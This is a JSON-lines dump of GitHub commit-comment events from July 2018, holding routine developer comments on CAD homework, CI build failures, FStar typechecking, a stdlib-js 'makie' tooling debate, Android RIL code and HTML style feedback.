{"id":"7933509673","type":"CommitCommentEvent","actor":{"login":"strumet"},"repo":{"name":"strumet/strumet.github.io"},"payload":{"comment":{"id":29632258,"position":null,"line":null,"path":null,"commit_id":"4b67531e6c87e83842c1a1b331080005a78d006b","created_at":"2018-07-08T07:18:43Z","updated_at":"2018-07-08T07:18:43Z","author_association":"OWNER","body":"Ciao Sofia,\r\n[l'esercizio cad EX02](https://github.com/strumet/strumet.github.io/blob/4b67531e6c87e83842c1a1b331080005a78d006b/ex/cad/894161_02.pdf) è corretto rispetto alle indicazioni fornite (raddoppio dello spessore del muro, inserimento di un nuovo arredo contenente due spessori).\r\nSono però [scomparsi tutti gli arredi già presenti negli esercizi precedenti](https://github.com/strumet/strumet.github.io/blob/master/ex/accepted_works/cad/894161_01.pdf) (tavoli, sedie, cucine). Forse hai disattivato il layer che li contiene oppure hai modificato le proprietà di output del colore col quale sono stati disegnati nel ctb.\r\nUna volta corretto questo difetto il file è pronto per essere aggiunto nella cartella _accepted_works_\r\nmf"}},"created_at":"2018-07-08T07:18:43Z"}
{"id":"7933510531","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29632261,"position":null,"line":null,"path":null,"commit_id":"210319bfa3ec1d3892ad0b4bc32523b589334872","created_at":"2018-07-08T07:19:31Z","updated_at":"2018-07-08T07:19:31Z","author_association":"NONE","body":"### Results for event id: a1e6a6c8-7c28-427d-a393-75261122e6af\n<details><summary>DockerServerless : Deploy to Lambda (82db6a) Docker output validation failed for outputRegex</summary>\n<p>\n\n**output tail (640 lines total):**\n\n```\n...\n[728] \u001b[1m/usr/workspace/clone/node_modules/aws-sdk/lib/aws.js\u001b[39m\u001b[22m 159 bytes {\u001b[1m\u001b[33m0\u001b[39m\u001b[22m}\u001b[1m\u001b[32m [built]\u001b[39m\u001b[22m\n[729] \u001b[1m./src/index.js\u001b[39m\u001b[22m 6.06 KiB {\u001b[1m\u001b[33m0\u001b[39m\u001b[22m}\u001b[1m\u001b[32m [built]\u001b[39m\u001b[22m\n    + 715 hidden modules\nServerless: Zip function: /usr/workspace/clone/packages/sample-dynamo/.build/.webpack/sample-dynamo [78 ms]\nServerless: Packaging service...\nServerless: Remove /usr/workspace/clone/packages/sample-dynamo/.build/.webpack\n \n  Serverless Error ---------------------------------------\n \n  Environment variable avtest must contain string\n \n  Get Support --------------------------------------------\n     Docs:          docs.serverless.com\n     Bugs:          github.com/serverless/serverless/issues\n     Issues:        forum.serverless.com\n \n  Your Environment Information -----------------------------\n     OS:                     linux\n     Node Version:           8.11.1\n     Serverless Version:     1.28.0\n \nerror Command failed with exit code 1.\ninfo Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.\nApiGateway Endpoints:\nFAILURE:  sample-default\nFAILURE:  sample-dynamo\n\nAT LEAST ONE DEPLOYMENT FAILED\nExecution time was 132 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-08T07:19:31Z"}
{"id":"7933511965","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632264,"position":772,"line":957,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T07:20:46Z","updated_at":"2018-07-08T07:20:46Z","author_association":"NONE","body":"But if mask6 is the SP ipv6 prefix then this check makes no sense..."}},"created_at":"2018-07-08T07:20:46Z"}
{"id":"7933521015","type":"CommitCommentEvent","actor":{"login":"mtzguido"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":29632299,"position":null,"line":null,"path":null,"commit_id":"98bdc06768b2861b8514decd0ec2a4a6ea732985","created_at":"2018-07-08T07:29:11Z","updated_at":"2018-07-08T07:29:11Z","author_association":"CONTRIBUTOR","body":"The tactic seems to succeed here, the error about CheckNoUvars comes\nfrom the typechecker as a final check over a top-level definition. In\nthis case a universe unification variable was not solved, so we bail\nout.\n\nAlso, this seems to work on batch mode... *and* produce the exact same\nwitness in both cases, so there's some pretty dark magic going on here\nas far as I can tell.\nOn Sat, 7 Jul 2018 at 20:03, Tahina Ramananandro (professional\naccount) <notifications@github.com> wrote:\n>\n> An example with ifthenelse and and_then\n>\n> @mtzguido: this works, but if you change T.SMT to T.Goal in\n> MiniParseExample.example32, then you will get missing\n> unification variables.\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/FStarLang/FStar/commit/98bdc06768b2861b8514decd0ec2a4a6ea732985\n"}},"created_at":"2018-07-08T07:29:11Z"}
{"id":"7933521201","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29632301,"position":null,"line":null,"path":null,"commit_id":"298e170b36b79f4c6b19816a7abbf8392a490840","created_at":"2018-07-08T07:29:23Z","updated_at":"2018-07-08T07:29:23Z","author_association":"MEMBER","body":"Oh, I didn't really mean to leave the authorship this way.  It's what squash via `git rebase -i` has left :-)"}},"created_at":"2018-07-08T07:29:23Z"}
{"id":"7933521583","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29632302,"position":null,"line":null,"path":null,"commit_id":"9290bb76192afb16d7056589b4e3e7a1ba6d2930","created_at":"2018-07-08T07:29:45Z","updated_at":"2018-07-08T07:29:45Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-45.28%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-08T07:29:45Z"}
{"id":"7933522527","type":"CommitCommentEvent","actor":{"login":"Emmzzo"},"repo":{"name":"Emmzzo/tresRepo"},"payload":{"comment":{"id":29632307,"position":null,"line":null,"path":null,"commit_id":"2c78c9704a3c34231ad5deb2e367bcf958239e13","created_at":"2018-07-08T07:30:29Z","updated_at":"2018-07-08T07:30:29Z","author_association":"OWNER","body":"Hello group this my change"}},"created_at":"2018-07-08T07:30:29Z"}
{"id":"7933523728","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29632309,"position":null,"line":null,"path":null,"commit_id":"06120bd9403fb64b44ddcbbbf90c7497ea45abb3","created_at":"2018-07-08T07:31:34Z","updated_at":"2018-07-08T07:31:34Z","author_association":"NONE","body":"Can I use `sprintf` for the 3rd parameter in `RAW_HOOK_OEM_CMD_SWITCH_DATAPREFER` ?\r\nMy RIL need it for sim slot check"}},"created_at":"2018-07-08T07:31:34Z"}
{"id":"7933529187","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-webhook-demo"},"payload":{"comment":{"id":29632315,"position":null,"line":null,"path":null,"commit_id":"f62434ca2c4971bee0954f8c1cc0eed43dbe1883","created_at":"2018-07-08T07:36:43Z","updated_at":"2018-07-08T07:36:43Z","author_association":"OWNER","body":"comment 1"}},"created_at":"2018-07-08T07:36:43Z"}
{"id":"7933529545","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29632317,"position":null,"line":null,"path":null,"commit_id":"9290bb76192afb16d7056589b4e3e7a1ba6d2930","created_at":"2018-07-08T07:37:05Z","updated_at":"2018-07-08T07:37:05Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Build Failed\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 628\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-33.02%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-0.0%25-red.png)</a>\n"}},"created_at":"2018-07-08T07:37:05Z"}
{"id":"7933529609","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"technic/e2testBox"},"payload":{"comment":{"id":29632318,"position":null,"line":null,"path":null,"commit_id":"9eea917bb356d2a0be217d33e4db49e2734aca49","created_at":"2018-07-08T07:37:07Z","updated_at":"2018-07-08T07:37:07Z","author_association":"NONE","body":"Is \"e2testBox\" operational with PLi's develop branch? I can really use this tool ..."}},"created_at":"2018-07-08T07:37:07Z"}
{"id":"7933531032","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29632321,"position":null,"line":null,"path":null,"commit_id":"9290bb76192afb16d7056589b4e3e7a1ba6d2930","created_at":"2018-07-08T07:38:27Z","updated_at":"2018-07-08T07:38:27Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9290bb76192afb16d7056589b4e3e7a1ba6d2930-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-08T07:38:27Z"}
{"id":"7933532766","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632324,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:40:06Z","updated_at":"2018-07-08T07:40:06Z","author_association":"MEMBER","body":"See the docs: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options\r\n\r\nBy default, the `env` optio of environment key-value pairs, is set equal to `process.env`. Hence the above plugin works. In the same vain, one could easily add `makie` plugins for the remaining `make` commands. I would like that since I often cd into a sub-directory and then cannot use `make`. Any reason against that?"}},"created_at":"2018-07-08T07:40:06Z"}
{"id":"7933532809","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-webhook-demo"},"payload":{"comment":{"id":29632325,"position":null,"line":null,"path":null,"commit_id":"f62434ca2c4971bee0954f8c1cc0eed43dbe1883","created_at":"2018-07-08T07:40:09Z","updated_at":"2018-07-08T07:40:09Z","author_association":"OWNER","body":"commen 2"}},"created_at":"2018-07-08T07:40:09Z"}
{"id":"7933534861","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632330,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:42:02Z","updated_at":"2018-07-08T07:42:02Z","author_association":"MEMBER","body":"Interesting. The following errors for me:\r\n\r\n```bash\r\n$ makie citation-reference CITATION=@fu:2008a\r\nUnrecognized/unsupported Makefile target: `citation-reference CITATION=@fu:2008a`.\r\n```"}},"created_at":"2018-07-08T07:42:02Z"}
{"id":"7933535464","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-webhook-demo"},"payload":{"comment":{"id":29632331,"position":null,"line":null,"path":null,"commit_id":"f62434ca2c4971bee0954f8c1cc0eed43dbe1883","created_at":"2018-07-08T07:42:37Z","updated_at":"2018-07-08T07:42:37Z","author_association":"OWNER","body":"commen 3"}},"created_at":"2018-07-08T07:42:37Z"}
{"id":"7933535506","type":"CommitCommentEvent","actor":{"login":"getdls"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29632332,"position":null,"line":null,"path":null,"commit_id":"d5ef8208fe852b75f24ba1c955b85aa89a28d099","created_at":"2018-07-08T07:42:40Z","updated_at":"2018-07-08T07:42:40Z","author_association":"COLLABORATOR","body":"NP,  good work on the other stuff, nsight really doesn't like this game.\r\n "}},"created_at":"2018-07-08T07:42:40Z"}
{"id":"7933535751","type":"CommitCommentEvent","actor":{"login":"fpersico"},"repo":{"name":"teamdigitale/italia-app"},"payload":{"comment":{"id":29632333,"position":null,"line":null,"path":null,"commit_id":"33d336e3845a6f4fd82246bfedc5b10e3d1e065c","created_at":"2018-07-08T07:42:57Z","updated_at":"2018-07-08T07:42:57Z","author_association":"COLLABORATOR","body":"Doesen't just 1 build without cache fix the problem?"}},"created_at":"2018-07-08T07:42:57Z"}
{"id":"7933536778","type":"CommitCommentEvent","actor":{"login":"mtzguido"},"repo":{"name":"FStarLang/FStar"},"payload":{"comment":{"id":29632336,"position":null,"line":null,"path":null,"commit_id":"98bdc06768b2861b8514decd0ec2a4a6ea732985","created_at":"2018-07-08T07:44:00Z","updated_at":"2018-07-08T07:44:00Z","author_association":"CONTRIBUTOR","body":"The part that really puzzles me is that all variables arising from\nMeta-F* must have been solved or Meta-F* would have complained, not\nthe typechecker.\n\nAlso I don't see the variable anywhere in the term, so how is the\ntypechecker finding it?\nOn Sun, 8 Jul 2018 at 00:28, Guido Martínez <mtzguido@gmail.com> wrote:\n>\n> The tactic seems to succeed here, the error about CheckNoUvars comes\n> from the typechecker as a final check over a top-level definition. In\n> this case a universe unification variable was not solved, so we bail\n> out.\n>\n> Also, this seems to work on batch mode... *and* produce the exact same\n> witness in both cases, so there's some pretty dark magic going on here\n> as far as I can tell.\n> On Sat, 7 Jul 2018 at 20:03, Tahina Ramananandro (professional\n> account) <notifications@github.com> wrote:\n> >\n> > An example with ifthenelse and and_then\n> >\n> > @mtzguido: this works, but if you change T.SMT to T.Goal in\n> > MiniParseExample.example32, then you will get missing\n> > unification variables.\n> >\n> > --\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly or view it on GitHub:\n> > https://github.com/FStarLang/FStar/commit/98bdc06768b2861b8514decd0ec2a4a6ea732985\n"}},"created_at":"2018-07-08T07:44:00Z"}
{"id":"7933536963","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632337,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:44:10Z","updated_at":"2018-07-08T07:44:10Z","author_association":"MEMBER","body":"If the environment variable is specified before `makie` it works:\r\n\r\n```bash\r\n$ CITATION=@marsaglia:2000a makie citation-reference\r\n```"}},"created_at":"2018-07-08T07:44:10Z"}
{"id":"7933537006","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29632338,"position":null,"line":null,"path":null,"commit_id":"06120bd9403fb64b44ddcbbbf90c7497ea45abb3","created_at":"2018-07-08T07:44:12Z","updated_at":"2018-07-08T07:44:12Z","author_association":"OWNER","body":"What the code look like?"}},"created_at":"2018-07-08T07:44:12Z"}
{"id":"7933538240","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632343,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:45:26Z","updated_at":"2018-07-08T07:45:26Z","author_association":"MEMBER","body":"Right. In general, I am not in favor of such differences with `make`; hence, the reason for not supporting other commands."}},"created_at":"2018-07-08T07:45:26Z"}
{"id":"7933541005","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632348,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:48:03Z","updated_at":"2018-07-08T07:48:03Z","author_association":"MEMBER","body":"For things like creating citations, it is easy enough to simply have two terminals open: one in the root project directory and the other which can be walked to the desired child directory. When you want to run child directory specific commands, use `makie`. Otherwise, use the first terminal and run commands there."}},"created_at":"2018-07-08T07:48:03Z"}
{"id":"7933544540","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632353,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:51:19Z","updated_at":"2018-07-08T07:51:19Z","author_association":"MEMBER","body":"Hmm, I am not sure I see the problem. In all existing `README.md` files for `make` commands, the environment variables are also supplied beforehand. One could also argue that right now, the difference in offered functionality between `make` and `makie` makes it harder for users than need be as they will not know which commands are available via `makie` and which ones are not. Obviously, I can remove the command again; it took only a few minutes or so to add. However, I feel this amounts to intentionally withholding useful functionality from users due to an overemphasis on principles. "}},"created_at":"2018-07-08T07:51:19Z"}
{"id":"7933545986","type":"CommitCommentEvent","actor":{"login":"aphichatkhan"},"repo":{"name":"krto456/MJU_COMSCI_WORKSHOP"},"payload":{"comment":{"id":29632354,"position":null,"line":null,"path":null,"commit_id":"a4a3a7ce93f9029d3b509a41fe52d13918ea14aa","created_at":"2018-07-08T07:52:44Z","updated_at":"2018-07-08T07:52:44Z","author_association":"COLLABORATOR","body":"humnoi"}},"created_at":"2018-07-08T07:52:44Z"}
{"id":"7933547826","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29632356,"position":null,"line":null,"path":null,"commit_id":"f892d70de03b9ef0d4f7c41dcfa5fb0b10ba7739","created_at":"2018-07-08T07:54:02Z","updated_at":"2018-07-08T07:54:02Z","author_association":"MEMBER","body":"Update in single commit next time. This is ugly way."}},"created_at":"2018-07-08T07:54:02Z"}
{"id":"7933547904","type":"CommitCommentEvent","actor":{"login":"yeshwanthjadhav"},"repo":{"name":"yeshwanthjadhav/sprintboot-restful-webservices"},"payload":{"comment":{"id":29632358,"position":null,"line":null,"path":null,"commit_id":"1018f8770f60572f700bc1b01284dcf6beb836fe","created_at":"2018-07-08T07:54:06Z","updated_at":"2018-07-08T07:54:06Z","author_association":"OWNER","body":"If \"User\" Bean doesn't have default constructor service will through HTTP 500 Internal server exception."}},"created_at":"2018-07-08T07:54:06Z"}
{"id":"7933548722","type":"CommitCommentEvent","actor":{"login":"yeshwanthjadhav"},"repo":{"name":"yeshwanthjadhav/sprintboot-restful-webservices"},"payload":{"comment":{"id":29632363,"position":null,"line":null,"path":null,"commit_id":"1018f8770f60572f700bc1b01284dcf6beb836fe","created_at":"2018-07-08T07:54:54Z","updated_at":"2018-07-08T07:54:54Z","author_association":"OWNER","body":"Chrome postman add can be used to validate post method."}},"created_at":"2018-07-08T07:54:54Z"}
{"id":"7933549040","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29632365,"position":null,"line":null,"path":null,"commit_id":"06120bd9403fb64b44ddcbbbf90c7497ea45abb3","created_at":"2018-07-08T07:55:12Z","updated_at":"2018-07-08T07:55:12Z","author_association":"NONE","body":"This is what is was in Java\r\nhttps://github.com/remilia15/android_device_samsung_scx30g-common/blob/cm-14.1/ril/SC7730SRIL.java#L68\r\n\r\nAnd just realized that I can't `sprintf` on a non-char variable"}},"created_at":"2018-07-08T07:55:12Z"}
{"id":"7933549376","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632368,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:55:31Z","updated_at":"2018-07-08T07:55:31Z","author_association":"MEMBER","body":"Backtracking insofar as the documentation seems to place the environment variables between `make` and the command. Remembered this differently (possibly due to how I use them personally)."}},"created_at":"2018-07-08T07:55:31Z"}
{"id":"7933550018","type":"CommitCommentEvent","actor":{"login":"cloudify"},"repo":{"name":"teamdigitale/italia-app"},"payload":{"comment":{"id":29632369,"position":null,"line":null,"path":null,"commit_id":"33d336e3845a6f4fd82246bfedc5b10e3d1e065c","created_at":"2018-07-08T07:56:11Z","updated_at":"2018-07-08T07:56:11Z","author_association":"MEMBER","body":"it's weird because the first build did work and the second failed, it seems like it fails when you reinstall all packages (i.e. reset the package cache) - with this temp fix it works without reinstalling all the packages\r\n\r\nbtw checkout the artifacts [here](https://circleci.com/gh/teamdigitale/italia-app/3834#artifacts/containers/0)\r\n\r\nI'm now trying to fix the test (i.e. see why it doesn't pass), besides that, seems like now Detox works fine on circleci :)"}},"created_at":"2018-07-08T07:56:11Z"}
{"id":"7933551587","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29632370,"position":null,"line":null,"path":null,"commit_id":"06120bd9403fb64b44ddcbbbf90c7497ea45abb3","created_at":"2018-07-08T07:57:38Z","updated_at":"2018-07-08T07:57:38Z","author_association":"OWNER","body":"Have you tried { 9, 4, simId } ?"}},"created_at":"2018-07-08T07:57:38Z"}
{"id":"7933552212","type":"CommitCommentEvent","actor":{"login":"zzz1999"},"repo":{"name":"Nukkit-coders/MobPlugin"},"payload":{"comment":{"id":29632372,"position":null,"line":null,"path":null,"commit_id":"9af619b0cf9f98621fa9c386538f0d7111de5982","created_at":"2018-07-08T07:58:11Z","updated_at":"2018-07-08T07:58:11Z","author_association":"MEMBER","body":"#25 wrong number"}},"created_at":"2018-07-08T07:58:11Z"}
{"id":"7933552358","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632373,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:58:19Z","updated_at":"2018-07-08T07:58:19Z","author_association":"MEMBER","body":"Re: docs. This is incorrect. For example, see [1](https://github.com/stdlib-js/stdlib/tree/develop/tools/make/lib/examples#examples-c-files), [2](https://github.com/stdlib-js/stdlib/tree/develop/tools/make/lib/debug#usage), [3](https://github.com/stdlib-js/stdlib/tree/develop/tools/make/lib/benchmark#benchmark-cpp-files), etc etc.\r\n\r\nRe: `make` vs `makie`. I am not in favor of alternative semantics. That is confusing, regardless of functionality. `makie` was intended for filtering directory paths, not as a drop-in replacement for `make`.\r\n\r\nRe: `makie` commands. We can add support for `makie --help` for printing the list of supported commands. Developers need not assume that `makie` will support all of `make`, which would be silly. And if we don't support all of `make`, then the \"confusion\" will persist.\r\n\r\nThe current setup, IMO, is fine. Use more than 1 terminal and only use `makie` when you want to run **directory-specific** commands. If you aren't running a directory-specific command, don't use `makie`."}},"created_at":"2018-07-08T07:58:19Z"}
{"id":"7933552738","type":"CommitCommentEvent","actor":{"login":"expez"},"repo":{"name":"clojure-emacs/clj-refactor.el"},"payload":{"comment":{"id":29632374,"position":null,"line":null,"path":null,"commit_id":"632be9e9bab1045fd5c1dcacd4f5781c2a49db81","created_at":"2018-07-08T07:58:40Z","updated_at":"2018-07-08T07:58:40Z","author_association":"MEMBER","body":"@bbatsov @vemv I've cleaned this up slightly in https://github.com/clojure-emacs/clj-refactor.el/commit/443f0860d1d1c209cf4baae998f55df0616a819f\r\n\r\nThanks for your input @bbatsov! :+1: "}},"created_at":"2018-07-08T07:58:40Z"}
{"id":"7933553123","type":"CommitCommentEvent","actor":{"login":"PHY-GIT"},"repo":{"name":"PHY-GIT/BLE-TI"},"payload":{"comment":{"id":29632375,"position":1,"line":1,"path":"新建文件夹/sdsds.txt","commit_id":"79dbde4e9922748f3cd2adfaaa9b9656fba2774e","created_at":"2018-07-08T07:59:03Z","updated_at":"2018-07-08T07:59:03Z","author_association":"OWNER","body":"22121\r\n\r\n"}},"created_at":"2018-07-08T07:59:03Z"}
{"id":"7933554023","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632376,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T07:59:51Z","updated_at":"2018-07-08T07:59:51Z","author_association":"MEMBER","body":"If I am not mistaken, one could refactor the makie `bin` to support the cases where environment variables are not placed in front. Assuming we can support the same semantics, would you be open to support all `make` commands also via `makie`?"}},"created_at":"2018-07-08T07:59:51Z"}
{"id":"7933555005","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29632384,"position":null,"line":null,"path":null,"commit_id":"06120bd9403fb64b44ddcbbbf90c7497ea45abb3","created_at":"2018-07-08T08:00:28Z","updated_at":"2018-07-08T08:00:28Z","author_association":"NONE","body":"So I don't need const right? Because slotId will change in runtime"}},"created_at":"2018-07-08T08:00:28Z"}
{"id":"7933555735","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29632385,"position":null,"line":null,"path":null,"commit_id":"06120bd9403fb64b44ddcbbbf90c7497ea45abb3","created_at":"2018-07-08T08:01:02Z","updated_at":"2018-07-08T08:01:02Z","author_association":"OWNER","body":"No const is ok"}},"created_at":"2018-07-08T08:01:02Z"}
{"id":"7933556019","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"d-Johnny/friends"},"payload":{"comment":{"id":29632386,"position":2,"line":2,"path":"index.html","commit_id":"de89f875cd2ad5ee000e8105e32221ae47ddd20b","created_at":"2018-07-08T08:01:14Z","updated_at":"2018-07-08T08:01:14Z","author_association":"COLLABORATOR","body":"Если страница на русском то правильней указывать \r\n```\r\n<html lang=\"en\">\r\n```\r\nЭто подскажет поисковым системам на каком языке индексировать сайт"}},"created_at":"2018-07-08T08:01:14Z"}
{"id":"7933556577","type":"CommitCommentEvent","actor":{"login":"phangchaff001"},"repo":{"name":"PratchayaKhunsee/MJUTEST"},"payload":{"comment":{"id":29632389,"position":null,"line":null,"path":null,"commit_id":"51f54bd277be6171e23b89720daf9097782781c9","created_at":"2018-07-08T08:01:40Z","updated_at":"2018-07-08T08:01:40Z","author_association":"COLLABORATOR","body":"น้องแตงวิทย์คอมจ้าาาา"}},"created_at":"2018-07-08T08:01:40Z"}
{"id":"7933556851","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"d-Johnny/friends"},"payload":{"comment":{"id":29632391,"position":27,"line":27,"path":"index.html","commit_id":"de89f875cd2ad5ee000e8105e32221ae47ddd20b","created_at":"2018-07-08T08:01:53Z","updated_at":"2018-07-08T08:01:53Z","author_association":"COLLABORATOR","body":"Хорошая практика, когда закрывающий тэг находится под открывающим тегом"}},"created_at":"2018-07-08T08:01:53Z"}
{"id":"7933557735","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"d-Johnny/friends"},"payload":{"comment":{"id":29632394,"position":31,"line":31,"path":"index.html","commit_id":"de89f875cd2ad5ee000e8105e32221ae47ddd20b","created_at":"2018-07-08T08:02:37Z","updated_at":"2018-07-08T08:02:37Z","author_association":"COLLABORATOR","body":"вот так можно вставить ссылку на другую страницу:\r\n```\r\n<a href=\"pages.html\">Фото</a>\r\n```"}},"created_at":"2018-07-08T08:02:37Z"}
{"id":"7933558631","type":"CommitCommentEvent","actor":{"login":"thisbejohn"},"repo":{"name":"thisbejohn/findhero"},"payload":{"comment":{"id":29632397,"position":null,"line":null,"path":null,"commit_id":"250dccae71d9ce1d625c76bdfe3ecbc5bc877607","created_at":"2018-07-08T08:03:23Z","updated_at":"2018-07-08T08:03:23Z","author_association":"OWNER","body":"A"}},"created_at":"2018-07-08T08:03:23Z"}
{"id":"7933559359","type":"CommitCommentEvent","actor":{"login":"mmdnetwork"},"repo":{"name":"mmdnetwork/occupythetrees.com"},"payload":{"comment":{"id":29632398,"position":null,"line":null,"path":null,"commit_id":"2d0366694ec246315f5e14ef21765c62d824e2e7","created_at":"2018-07-08T08:04:03Z","updated_at":"2018-07-08T08:04:03Z","author_association":"OWNER","body":"Cleaned up the theme a bit.  I also moved the Create/Login Profile links to the Primary sidebar above the Follow Us buttons and the Shopping Cart.  I also changed the Home Page to an actual Homepage.  I also revamped the photo gallery a bit."}},"created_at":"2018-07-08T08:04:03Z"}
